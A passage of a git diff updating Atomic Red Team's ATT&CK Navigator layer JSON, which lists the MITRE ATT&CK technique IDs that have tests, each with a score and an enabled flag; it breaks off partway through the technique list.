techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1106","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.002","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1114.001","score":100,"enabled":true},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1120","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1127.001","score":100,"enabled":true},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1133","score":100,"enabled":true},{"techniqueID":"T1134.001","score":100,"enabled":true},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1134.004","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1136.002","score":100,"enabled":true},{"techniqueID":"T1137.002","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1137.004","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204.002","score":100,"enabled":true},{"techniqueID":"T1204","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1216.001","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218.001","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true},{"techniqueID":"T1218.003","score":100,"enabled":true},{"techniqueID":"T1218.004","score":100,"enabled":true},{"techniqueID":"T1218.005","score":100,"enabled":true},{"techniqueID":"T1218.007","score":100,"enabled":true},{"techniqueID":"T1218.008","score":100,"enabled":true},{"techniqueID":"T1218.009","score":100,"enabled":true},{"techniqueID":"T1218.010","score":100,"enabled":true},{"techniqueID":"T1218.011","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1222.001","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true},{"techniqueID":"T1543.003","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true},{"techniqueID":"T1546.003","score":100,"enabled":true},{"techniqueID":"T1546.007","score":100,"enabled":true},{"techniqueID":"T1546.008","score":100,"enabled":true},{"techniqueID":"T1546.010","score":100,"enabled":true},{"techniqueID":"T1546.011","score":100,"enabled":true},{"techniqueID":"T1546.012","score":100,"enabled":true},{"techniqueID":"T1546.013","score":100,"enabled":true},{"techniqueID":"T1547.001","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.004","score":100,"enabled":true},{"techniqueID":"T1547.005","score":100,"enabled":true},{"techniqueID":"T1547.009","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true},{"techniqueID":"T1550","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.006","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1556.002","score":100,"enabled":true},{"techniqueID":"T1556","score":100,"enabled":true},{"techniqueID":"T1558.001","score":100,"enabled":true},{"techniqueID":"T1558","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true},{"techniqueID":"T1559.002","score":100,"enabled":true},{"techniqueID":"T1559","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1563.002","score":100,"enabled":true},{"techniqueID":"T1563","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true},{"techniqueID":"T1564.004","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1566.001","score":100,"enabled":true},{"techniqueID":"T1566","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1573","score":100,"enabled":true},{"techniqueID":"T1574.001","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true},{"techniqueID":"T1574.009","score":100,"enabled":true},{"techniqueID":"T1574.011","score":100,"enabled":true},{"techniqueID":"T1574.012","score":100,"enabled":true}]} \ No newline at end of file diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json index 0dbf2397..17eb2eae 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json @@ -1 +1 @@ -{"version":"3.0","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true},{"techniqueID":"T1003.003","score":100,"enabled":true},{"techniqueID":"T1003.004","score":100,"enabled":true},{"techniqueID":"T1003.006","score":100,"enabled":true},{"techniqueID":"T1003.008","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1006","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1020","score":100,"enabled":true},{"techniqueID":"T1021.001","score":100,"enabled":true},{"techniqueID":"T1021","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true},{"techniqueID":"T1021.003","score":100,"enabled":true},{"techniqueID":"T1021.006","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027.004","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.004","score":100,"enabled":true},{"techniqueID":"T1036.006","score":100,"enabled":true},{"techniqueID":"T1037.001","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1037.002","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037.005","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.001","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053.004","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1055.012","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056.004","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.001","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.002","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1059.005","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true},{"techniqueID":"T1070.001","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.005","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1078.003","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1106","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.002","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1114.001","score":100,"enabled":true},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1120","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1127.001","score":100,"enabled":true},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1133","score":100,"enabled":true},{"techniqueID":"T1134.001","score":100,"enabled":true},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1134.004","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1136.002","score":100,"enabled":true},{"techniqueID":"T1137.002","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204.002","score":100,"enabled":true},{"techniqueID":"T1204","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1216.001","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218.001","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true},{"techniqueID":"T1218.003","score":100,"enabled":true},{"techniqueID":"T1218.004","score":100,"enabled":true},{"techniqueID":"T1218.005","score":100,"enabled":true},{"techniqueID":"T1218.007","score":100,"enabled":true},{"techniqueID":"T1218.008","score":100,"enabled":true},{"techniqueID":"T1218.009","score":100,"enabled":true},{"techniqueID":"T1218.010","score":100,"enabled":true},{"techniqueID":"T1218.011","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1222.001","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true},{"techniqueID":"T1543.001","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true},{"techniqueID":"T1543.003","score":100,"enabled":true},{"techniqueID":"T1543.004","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true},{"techniqueID":"T1546.003","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1546.007","score":100,"enabled":true},{"techniqueID":"T1546.008","score":100,"enabled":true},{"techniqueID":"T1546.010","score":100,"enabled":true},{"techniqueID":"T1546.011","score":100,"enabled":true},{"techniqueID":"T1546.012","score":100,"enabled":true},{"techniqueID":"T1546.013","score":100,"enabled":true},{"techniqueID":"T1546.014","score":100,"enabled":true},{"techniqueID":"T1547.001","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.004","score":100,"enabled":true},{"techniqueID":"T1547.005","score":100,"enabled":true},{"techniqueID":"T1547.006","score":100,"enabled":true},{"techniqueID":"T1547.007","score":100,"enabled":true},{"techniqueID":"T1547.009","score":100,"enabled":true},{"techniqueID":"T1547.011","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true},{"techniqueID":"T1550","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.006","score":100,"enabled":true},{"techniqueID":"T1553.001","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1555.001","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1556.002","score":100,"enabled":true},{"techniqueID":"T1556","score":100,"enabled":true},{"techniqueID":"T1558.001","score":100,"enabled":true},{"techniqueID":"T1558","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true},{"techniqueID":"T1559.002","score":100,"enabled":true},{"techniqueID":"T1559","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1562.006","score":100,"enabled":true},{"techniqueID":"T1563.002","score":100,"enabled":true},{"techniqueID":"T1563","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.002","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true},{"techniqueID":"T1564.004","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1566.001","score":100,"enabled":true},{"techniqueID":"T1566","score":100,"enabled":true},{"techniqueID":"T1569.001","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1573","score":100,"enabled":true},{"techniqueID":"T1574.001","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true},{"techniqueID":"T1574.009","score":100,"enabled":true},{"techniqueID":"T1574.011","score":100,"enabled":true},{"techniqueID":"T1574.012","score":100,"enabled":true}]} \ No newline at end of file +{"version":"3.0","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true},{"techniqueID":"T1003.003","score":100,"enabled":true},{"techniqueID":"T1003.004","score":100,"enabled":true},{"techniqueID":"T1003.006","score":100,"enabled":true},{"techniqueID":"T1003.008","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1006","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1020","score":100,"enabled":true},{"techniqueID":"T1021.001","score":100,"enabled":true},{"techniqueID":"T1021","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true},{"techniqueID":"T1021.003","score":100,"enabled":true},{"techniqueID":"T1021.006","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027.004","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.004","score":100,"enabled":true},{"techniqueID":"T1036.006","score":100,"enabled":true},{"techniqueID":"T1037.001","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1037.002","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037.005","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.001","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053.004","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1055.012","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056.004","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.001","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.002","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1059.005","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true},{"techniqueID":"T1070.001","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.005","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1078.003","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1106","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.002","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1114.001","score":100,"enabled":true},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1120","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1127.001","score":100,"enabled":true},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1133","score":100,"enabled":true},{"techniqueID":"T1134.001","score":100,"enabled":true},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1134.004","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1136.002","score":100,"enabled":true},{"techniqueID":"T1137.002","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1137.004","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204.002","score":100,"enabled":true},{"techniqueID":"T1204","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1216.001","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218.001","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true},{"techniqueID":"T1218.003","score":100,"enabled":true},{"techniqueID":"T1218.004","score":100,"enabled":true},{"techniqueID":"T1218.005","score":100,"enabled":true},{"techniqueID":"T1218.007","score":100,"enabled":true},{"techniqueID":"T1218.008","score":100,"enabled":true},{"techniqueID":"T1218.009","score":100,"enabled":true},{"techniqueID":"T1218.010","score":100,"enabled":true},{"techniqueID":"T1218.011","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1222.001","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true},{"techniqueID":"T1543.001","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true},{"techniqueID":"T1543.003","score":100,"enabled":true},{"techniqueID":"T1543.004","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true},{"techniqueID":"T1546.003","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1546.007","score":100,"enabled":true},{"techniqueID":"T1546.008","score":100,"enabled":true},{"techniqueID":"T1546.010","score":100,"enabled":true},{"techniqueID":"T1546.011","score":100,"enabled":true},{"techniqueID":"T1546.012","score":100,"enabled":true},{"techniqueID":"T1546.013","score":100,"enabled":true},{"techniqueID":"T1546.014","score":100,"enabled":true},{"techniqueID":"T1547.001","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.004","score":100,"enabled":true},{"techniqueID":"T1547.005","score":100,"enabled":true},{"